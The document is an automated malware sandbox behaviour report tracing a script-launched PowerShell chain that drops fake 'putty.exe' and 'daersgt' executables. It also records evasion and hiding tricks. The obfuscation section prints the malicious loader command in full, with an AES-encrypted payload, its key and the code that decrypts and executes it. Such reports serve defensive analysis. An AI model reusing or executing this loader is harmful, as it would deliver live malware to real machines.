                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rsaenh.dllJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptbase.dllJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: amsi.dllJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: userenv.dllJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: profapi.dllJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: windows.storage.dllJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wldp.dllJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msasn1.dllJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: gpapi.dllJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msisip.dllJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wshext.dllJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: appxsip.dllJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: opcservices.dllJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: secur32.dllJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: sspicli.dllJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: uxtheme.dllJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rasapi32.dllJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rasman.dllJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rtutils.dllJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mswsock.dllJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: winhttp.dllJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: iphlpapi.dllJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: dhcpcsvc6.dllJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: dhcpcsvc.dllJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: dnsapi.dllJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: winnsi.dllJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rasadhlp.dllJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: fwpuclnt.dllJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: propsys.dllJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: edputil.dllJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: urlmon.dllJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: iertutil.dllJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: srvcli.dllJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: netutils.dllJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: windows.staterepositoryps.dllJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wintypes.dllJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: appresolver.dllJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: bcp47langs.dllJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: slc.dllJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: sppc.dllJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: onecorecommonproxystub.dllJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: onecoreuapcommonproxystub.dllJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: apphelp.dllJump to behavior
                Source: C:\Users\user\AppData\Roaming\putty.exeSection loaded: apphelp.dllJump to behavior
                Source: C:\Users\user\AppData\Roaming\putty.exeSection loaded: msimg32.dllJump to behavior
                Source: C:\Users\user\AppData\Roaming\putty.exeSection loaded: msvcr100.dllJump to behavior
                Source: C:\Windows\explorer.exeSection loaded: taskschd.dllJump to behavior
                Source: C:\Windows\explorer.exeSection loaded: webio.dllJump to behavior
                Source: C:\Users\user\AppData\Roaming\daersgtSection loaded: apphelp.dllJump to behavior
                Source: C:\Users\user\AppData\Roaming\daersgtSection loaded: msimg32.dllJump to behavior
                Source: C:\Users\user\AppData\Roaming\daersgtSection loaded: msvcr100.dllJump to behavior
                Source: C:\Windows\System32\wscript.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{B54F3741-5B07-11cf-A4B0-00AA004A55E8}\InprocServer32Jump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorrc.dllJump to behavior
                Source: C:\Users\user\AppData\Roaming\putty.exeFile opened: C:\Windows\SysWOW64\msvcr100.dllJump to behavior

                Data Obfuscation

                barindex
                Source: C:\Users\user\AppData\Roaming\putty.exeUnpacked PE file: 4.2.putty.exe.400000.0.unpack .text:ER;.data:W;.rsrc:R; vs .text:EW;
                Source: C:\Users\user\AppData\Roaming\daersgtUnpacked PE file: 7.2.daersgt.400000.0.unpack .text:ER;.data:W;.rsrc:R; vs .text:EW;
                Source: C:\Windows\System32\wscript.exeAnti Malware Scan Interface: .Run("powershell.exe -w 1 -ep Unrestricted -nop function raNdD($EzfV){return -sp", "0", "true");
                Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -w 1 -ep Unrestricted -nop function raNdD($EzfV){return -split ($EzfV -replace '..', '0x$& ')};$UNmWG = raNdD('153622473F3D34B5890B52ECDE322F45E48AC8AA1EBE0731587B2A8D1EB5D7236A3C8B617FAE24809377210FCDAA8256B284412DD11EC0B51122B1EF9F3232128A30DA876225B23A0A21033A7E42AB95CC5ACD28D3BAC87A3C04863F7224792517962091F8B92DF84D8699F4A63BB1EACD4E7F895F70B40175EDCBD0858EC7333AE6A1AB73D0F0C2C360B3826EBCACACB9561C41AF524F59C7FE7200CFE0C18E7CBE012252D4DA348D9867636DE8BE7309771296CCEA63DC8A00F1A6607291A9D940AC0FBE016E1469B44FFC93FB881EE1B5B55931B83474C09BA7D8326E069F30F7EF3AD15149CE314DEBF42606E2068557F79F77A379EAF734C27C2D3B854DBC0DC2752FBB6A8E67A31EF7EC67BD5A9B6BBC6B643AC644B7231B34788E58522EE2FF086384D09C1974CF97199996486FD9081C9C03779BC054D7DBD1AE0F032973099215905B2991EEDE39D374557E6BF7E27D2284AB23157862E2CBB4C7F31D6EA0F0594CBE9A410EBAA90180045174CFB119CD292B770AC51A76BD48FEDA376633D5D95F3C12FCD9A75FDD9D0DBDE8551877FA8C38E86B9D006E2A51E2D327743DB0EBECEA698C101441CF173D4614D44DAA2F4802C84FA83BDCB67CCFB31C07AB202A98C6B54200BBAEE17899ED11E5B03E97ADD428647A41B73BF380058DE3A0F98E978F9B83CAB3C28FE019C43A7BB0D040D5CCD700B059F3734BD804AE813EC4E10D1EA58FCBB0EC6C4C8CDE60CD35C6D4012EECE60D1A1EB2466BE1E327B203A6FEADD590E2D7A77C218709D3259C666B281C8D292197492CB5078DC69512F5FE4EA4467A62B291A42BF5576D12E86AAA0AFEB464D865F88ADAAB7D71DEBE3FE860AA8D5C1DC08F163020FD6DF7298ABF82642D73139A20C305891AC189D3EBB5DE86DD02CABDB425F68BC4');$cvlPy=-join [char[]](([Security.Cryptography.Aes]::Create()).CreateDecryptor((raNdD('5A456A634B52506273785A52424C5375')),[byte[]]::new(16)).TransformFinalBlock($UNmWG,0,$UNmWG.Length)); & $cvlPy.Substring(0,3) $cvlPy.Substring(3)
                Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -w 1 -ep Unrestricted -nop function raNdD($EzfV){return -split ($EzfV -replace '..', '0x$& ')};$UNmWG = raNdD('153622473F3D34B5890B52ECDE322F45E48AC8AA1EBE0731587B2A8D1EB5D7236A3C8B617FAE24809377210FCDAA8256B284412DD11EC0B51122B1EF9F3232128A30DA876225B23A0A21033A7E42AB95CC5ACD28D3BAC87A3C04863F7224792517962091F8B92DF84D8699F4A63BB1EACD4E7F895F70B40175EDCBD0858EC7333AE6A1AB73D0F0C2C360B3826EBCACACB9561C41AF524F59C7FE7200CFE0C18E7CBE012252D4DA348D9867636DE8BE7309771296CCEA63DC8A00F1A6607291A9D940AC0FBE016E1469B44FFC93FB881EE1B5B55931B83474C09BA7D8326E069F30F7EF3AD15149CE314DEBF42606E2068557F79F77A379EAF734C27C2D3B854DBC0DC2752FBB6A8E67A31EF7EC67BD5A9B6BBC6B643AC644B7231B34788E58522EE2FF086384D09C1974CF97199996486FD9081C9C03779BC054D7DBD1AE0F032973099215905B2991EEDE39D374557E6BF7E27D2284AB23157862E2CBB4C7F31D6EA0F0594CBE9A410EBAA90180045174CFB119CD292B770AC51A76BD48FEDA376633D5D95F3C12FCD9A75FDD9D0DBDE8551877FA8C38E86B9D006E2A51E2D327743DB0EBECEA698C101441CF173D4614D44DAA2F4802C84FA83BDCB67CCFB31C07AB202A98C6B54200BBAEE17899ED11E5B03E97ADD428647A41B73BF380058DE3A0F98E978F9B83CAB3C28FE019C43A7BB0D040D5CCD700B059F3734BD804AE813EC4E10D1EA58FCBB0EC6C4C8CDE60CD35C6D4012EECE60D1A1EB2466BE1E327B203A6FEADD590E2D7A77C218709D3259C666B281C8D292197492CB5078DC69512F5FE4EA4467A62B291A42BF5576D12E86AAA0AFEB464D865F88ADAAB7D71DEBE3FE860AA8D5C1DC08F163020FD6DF7298ABF82642D73139A20C305891AC189D3EBB5DE86DD02CABDB425F68BC4');$cvlPy=-join [char[]](([Security.Cryptography.Aes]::Create()).CreateDecryptor((raNdD('5A456A634B52506273785A52424C5375')),[byte[]]::new(16)).TransformFinalBlock($UNmWG,0,$UNmWG.Length)); & $cvlPy.Substring(0,3) $cvlPy.Substring(3)Jump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 2_2_00007FFAAB798412 push E85B7C0Dh; ret 2_2_00007FFAAB7984F9
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 2_2_00007FFAAB790943 push E95B7CD0h; ret 2_2_00007FFAAB7909C9
                Source: C:\Users\user\AppData\Roaming\putty.exeCode function: 4_2_00401068 push ebp; iretd 4_2_0040106E
                Source: C:\Users\user\AppData\Roaming\putty.exeCode function: 4_2_004010B4 push ss; ret 4_2_004010B5
                Source: C:\Users\user\AppData\Roaming\putty.exeCode function: 4_2_00542816 push ss; ret 4_2_00542817
                Source: C:\Users\user\AppData\Roaming\putty.exeCode function: 4_2_00542F0A push es; iretd 4_2_00542F0B
                Source: C:\Users\user\AppData\Roaming\putty.exeCode function: 4_2_0054922C push esi; retf 4_2_0054922D
                Source: C:\Users\user\AppData\Roaming\putty.exeCode function: 4_2_005427CA push ebp; iretd 4_2_005427D0
                Source: C:\Users\user\AppData\Roaming\putty.exeCode function: 4_2_0054478C push ebx; ret 4_2_00544792
                Source: C:\Users\user\AppData\Roaming\putty.exeCode function: 4_2_00546CA2 push ds; ret 4_2_00546CB5
                Source: C:\Users\user\AppData\Roaming\putty.exeCode function: 4_2_0060111B push ss; ret 4_2_0060111C
                Source: C:\Users\user\AppData\Roaming\putty.exeCode function: 4_2_006010CF push ebp; iretd 4_2_006010D5
                Source: C:\Users\user\AppData\Roaming\putty.exeCode function: 4_2_006018DC push es; iretd 4_2_006018DD
                Source: C:\Users\user\AppData\Roaming\daersgtCode function: 7_2_00401068 push ebp; iretd 7_2_0040106E
                Source: C:\Users\user\AppData\Roaming\daersgtCode function: 7_2_004010B4 push ss; ret 7_2_004010B5
                Source: C:\Users\user\AppData\Roaming\daersgtCode function: 7_2_00562816 push ss; ret 7_2_00562817
                Source: C:\Users\user\AppData\Roaming\daersgtCode function: 7_2_00562F0A push es; iretd 7_2_00562F0B
                Source: C:\Users\user\AppData\Roaming\daersgtCode function: 7_2_0056922C push esi; retf 7_2_0056922D
                Source: C:\Users\user\AppData\Roaming\daersgtCode function: 7_2_005627CA push ebp; iretd 7_2_005627D0
                Source: C:\Users\user\AppData\Roaming\daersgtCode function: 7_2_0056478C push ebx; ret 7_2_00564792
                Source: C:\Users\user\AppData\Roaming\daersgtCode function: 7_2_00566CA2 push ds; ret 7_2_00566CB5
                Source: C:\Users\user\AppData\Roaming\daersgtCode function: 7_2_005C111B push ss; ret 7_2_005C111C
                Source: C:\Users\user\AppData\Roaming\daersgtCode function: 7_2_005C18DC push es; iretd 7_2_005C18DD
                Source: C:\Users\user\AppData\Roaming\daersgtCode function: 7_2_005C10CF push ebp; iretd 7_2_005C10D5
                Source: putty.exe.2.drStatic PE information: section name: .text entropy: 7.7876604645270575
                Source: daersgt.5.drStatic PE information: section name: .text entropy: 7.7876604645270575
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile created: C:\Users\user\AppData\Roaming\putty.exeJump to dropped file
                Source: C:\Windows\explorer.exeFile created: C:\Users\user\AppData\Roaming\daersgtJump to dropped file
                Source: C:\Windows\explorer.exeFile created: C:\Users\user\AppData\Roaming\daersgtJump to dropped file

                Hooking and other Techniques for Hiding and Protection

                barindex
                Source: C:\Windows\explorer.exeFile opened: C:\Users\user\AppData\Roaming\daersgt:Zone.Identifier read attributes | deleteJump to behavior
                Source: C:\Windows\System32\wscript.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\wscript.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\wscript.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\explorer.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\explorer.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\explorer.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\explorer.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\explorer.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\explorer.exeProcess information set: NOOPENFILEERRORBOXJump to behavior

                Malware Analysis System Evasion

                barindex
                Source: C:\Users\user\AppData\Roaming\putty.exeKey enumerated: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Enum\SCSIJump to behavior
                Source: C:\Users\user\AppData\Roaming\putty.exeKey enumerated: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Enum\SCSIJump to behavior
                Source: C:\Users\user\AppData\Roaming\putty.exeKey enumerated: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Enum\SCSIJump to behavior
                Source: C:\Users\user\AppData\Roaming\putty.exeKey enumerated: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Enum\SCSIJump to behavior
                Source: C:\Users\user\AppData\Roaming\putty.exeKey enumerated: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Enum\SCSIJump to behavior
                Source: C:\Users\user\AppData\Roaming\putty.exeKey enumerated: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Enum\SCSIJump to behavior
                Source: C:\Users\user\AppData\Roaming\daersgtKey enumerated: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Enum\SCSIJump to behavior
                Source: C:\Users\user\AppData\Roaming\daersgtKey enumerated: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Enum\SCSIJump to behavior
                Source: C:\Users\user\AppData\Roaming\daersgtKey enumerated: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Enum\SCSIJump to behavior
                Source: C:\Users\user\AppData\Roaming\daersgtKey enumerated: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Enum\SCSIJump to behavior
                Source: C:\Users\user\AppData\Roaming\daersgtKey enumerated: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Enum\SCSIJump to behavior
                Source: C:\Users\user\AppData\Roaming\daersgtKey enumerated: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Enum\SCSIJump to behavior
                Source: C:\Users\user\AppData\Roaming\putty.exeAPI/Special instruction interceptor: Address: 7FFB2CECE814
                Source: C:\Users\user\AppData\Roaming\putty.exeAPI/Special instruction interceptor: Address: 7FFB2CECD584
                Source: C:\Users\user\AppData\Roaming\daersgtAPI/Special instruction interceptor: Address: 7FFB2CECE814
                Source: C:\Users\user\AppData\Roaming\daersgtAPI/Special instruction interceptor: Address: 7FFB2CECD584
                Source: putty.exe, 00000004.00000002.1493884615.000000000073E000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: ASWHOOKI
                Source: daersgt, 00000007.00000002.1730695199.00000000005FE000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: ASWHOOK
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
